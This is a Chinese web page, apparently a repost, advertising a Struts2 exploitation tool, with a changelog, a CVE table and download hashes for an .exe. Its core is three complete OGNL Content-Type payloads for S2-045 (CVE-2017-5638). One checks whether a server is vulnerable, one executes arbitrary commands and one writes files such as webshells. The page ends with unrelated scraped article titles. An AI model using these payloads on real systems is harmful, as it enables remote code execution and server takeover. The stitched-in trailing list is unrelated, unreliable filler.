Struts2漏洞利用工具下载(已更新V1.8版)

2017-03-21:

增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、

2017-03-07:

增加安恒信息研究员nike.zheng发现的S2-045,jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。http://struts.apache.org/docs/s2-045.html

相关exp:

S2-045:

1.验证漏洞,修改Content-Type,返回内容为“webpath”代表存在漏洞。

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}

2.执行命令

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}

3.上传文件:

%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}

S2-032 20160426  漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924

更新日志:

2017-03-21:

增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html

2017-03-07:

增加安恒信息研究员nike.zheng发现的S2-045,jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。http://struts.apache.org/docs/s2-045.html

2016-04-26:

增加最新的S2-032远程代码执行漏洞,和S2-019很相似。

参考:http://seclab.dbappsecurity.com.cn/?p=924

2015-12-01:

采用scanner读数据流,再也不用担心s16不能执行net user/ipconfig/netstat -an等命令了。

增加复杂数据包(multipart/form-data)提交方式进行漏洞利用,可绕过部分防护。可执行命令,暂时无法上传文件。

2014-11-12:

最近遇到s19这个debug模式开启导致代码执行,这个有点少,但还是有一些,为了方便大家把13版本修改了一下。可以利用这个漏洞执行命令、上传shell。

警告:

本工具为漏洞自查工具,请勿非法攻击他人网站!

==漏洞编号==============影响版本=========================官方公告==========================================影响范围=====

S2-045 CVE-2017-5638 Struts 2.3.5-2.3.31, Struts 2.5-2.5.10 http://struts.apache.org/docs/s2-045.html 影响范围较大

S2-037 CVE-2016-4438 Struts 2.3.20-2.3.28.1 http://struts.apache.org/docs/s2-037.html 影响范围小

S2-032 CVE-2016-3081 Struts 2.3.18-2.3.28 http://struts.apache.org/release/2.3.x/docs/s2-032.html 影响范围小

S2-020 CVE-2014-0094 Struts 2.0.0-2.3.16 http://struts.apache.org/release/2.3.x/docs/s2-020.html 影响范围小

S2-019 CVE-2013-4316 Struts 2.0.0-2.3.15.1 http://struts.apache.org/release/2.3.x/docs/s2-019.html 影响范围一般

S2-016 CVE-2013-2251 Struts 2.0.0-2.3.15 http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大

S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 http://struts.apache.org/release/2.3.x/docs/s2-013.html 未添加,S2-016范围内

S2-009 CVE-2011-3923 Struts 2.0.0-2.3.1.1 http://struts.apache.org/release/2.3.x/docs/s2-009.html 未添加,S2-016范围内

S2-005 CVE-2010-1870 Struts 2.0.0-2.1.8.1 http://struts.apache.org/release/2.2.x/docs/s2-005.html 未添加,S2-016范围内

仅提供验证漏洞使用,请勿非法使用,产生的任何法律问题,一概与本人无关。

下载地址:

文件名称: Struts2漏洞利用工具2017版.exe

文件大小: 104 KB (107008 字节)

文件版本: 1.8.0.0

修改时间: 2017年03月22日,17:39:29

MD5: 3B405C30A7028E05742D0FBF0961E6B2

SHA1: 1D69338543544B31444D0173C08E706D57F148CB

CRC32: 97AC167B

计算时间: 0.00s

s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)相关推荐

  1. s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)-阿里云开发者社区...

    Struts2漏洞利用工具下载(已更新V1.8版) 2017-03-21: 增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过 ...

  2. s2 安恒 漏洞验证工具_Struts2漏洞检查工具2018版(最新版)V2.0[带批量功能]

    2018-08-24: 增加S2-057 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16  此漏洞影响范围非常小,要求配置条件比较苛刻,同时,一些特定版本没有看到有 ...

  3. android手机log文件工具,手机文件日志app下载-手机文件日志 安卓版v1.0-PC6安卓网...

    手机文件日志app是一款便捷好用的免费文件安全管理手机客户端软件,手机文件日志app支持在线创建不同模块的日志管理分类窗口,通过手机文件日志软件随时在线查看,便捷安全储存管理. 软件介绍 手机文件日志 ...

  4. Android lua编辑工具,Lua脚本编辑器app下载-Lua脚本编辑器手机版下载 v1.0.2_5577安卓网...

    Lua脚本编辑器app下载推荐给大家,这是一款非常简洁好用的打码编辑神器,用户轻松下载使用,对代码进行编辑.测试.查错等,手机也能写代码,支持多种文件格式,打开.导出.保存都很方便. [软件介绍] L ...

  5. DayZ一键开服安装,开服工具,模组mod下载更新,工具!支持版本最新1.08--------1.03

    那如建立自己的服务器,体验模组带来的乐趣呢? 首先从steam上下在DayZ Server,下载好你是不能直接进入的,需要给他加载一些命令才能启动,对于命令的繁琐,小白我推荐用开服工具搭建服务器. 打 ...

  6. 【XSS漏洞-01】XSS漏洞简介、危害与分类及验证

    目录 1 XSS漏洞简介 2 XSS漏洞危害 3 XSS漏洞分类 3.1 反射型XSS 3.2 存储型XSS 3.3 DOM型XSS 3.3.1 节点树模型 3.3.2 DOM型XSS 4 漏洞验证 ...

  7. xp正版验证补丁_实操web漏洞验证——IIS HTTP.sys 整数溢出漏洞

    一.漏洞描述 Http.sys 是一个位于 Windows 操作系统核心组件,能够让任何应用程序通过它提供的接口,以 Http 协议进行信息通讯.微软在 Windows 2003 Server 里引进 ...

  8. 【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法

    目录 1 漏洞验证相关概念 2 XSS漏洞验证 2.1 常见POC 2.2 反射型XSS漏洞验证 2.3 存储型XSS漏洞验证 2.4 DOM型XSS漏洞验证 3 XSS语句构造与绕过 3.1 XSS ...

  9. 漏洞介绍及修复建议(漏洞汇总,建议收藏后期会不断更新)

    目录 未分类 Host 头攻击(高危) 域名访问限制不严格(高危) URL 重定向(中危) 会话劫持漏洞(中危) 会话固定漏洞(中危) DNS 域传送漏洞(中危) 检测到网站被黑痕迹(高危) 传输层保 ...

最新文章

  1. android 下拉菜单触发_Android实现三级联动下拉框 城市选择器(简单)
  2. Huffman Coding
  3. sed编辑器: 非交互
  4. python爬虫可视化界面_python爬虫---垃圾分类可视化界面
  5. 浅谈 System.Data.DataRowCollection 类
  6. mysql 1046 3d000_老师 出现ERROR 1046(3D000): No Database Selected怎么办
  7. 元宇宙大潮来袭?业内首个虚拟形象实时互动融合 SDK 来了!
  8. 能量视角下的GAN模型(二):GAN=“分析”+“采样”
  9. java struts2下载文件_java struts2入门学习---文件下载的二种方式
  10. Q117:PBRT-V3反射模型(Reflection Models)笔记
  11. 工业机器人控制系统的设计框架
  12. 2020/08 Trackers 清单
  13. vb.net 教程 20-3 控制Ie浏览器 2 获得Ie窗口的结构
  14. kindeditor+粘贴word图片
  15. PS中把图片白色背景变成透明的方法
  16. 分享一个开源的QT的串口示波器
  17. 悬浮View,可拖动,放手后自动吸附到屏幕边上。
  18. 深化“智能二道门”建设,化工厂人员定位系统深度解析!
  19. e派android 4.4.4,实用GPS手机到货 一周导航产品精选推荐
  20. 关于日常业务中常见公共字段的处理方法

热门文章

  1. Vue.js先入个门看看
  2. java jpa 模糊查询_JPA 以SQL实现分页不模糊查询(参数可能为空)
  3. sql将html转成excel,使用SQL*PLUS,构建完美excel或html输出
  4. [转]Python 获取Windows管理员权限
  5. linux之more命令
  6. Android之PullToRefresh(ListView 、GridView 、WebView)使用详解和总结
  7. 刷题≠学好数学,近百位名校名师告诉你,数学是怎么学好的?
  8. 有朋友问我为什么这么帅
  9. 成年人改变生活的方式,都是从它开始
  10. 考试必错规则:如果你觉得题目很简单,代表你肯定错了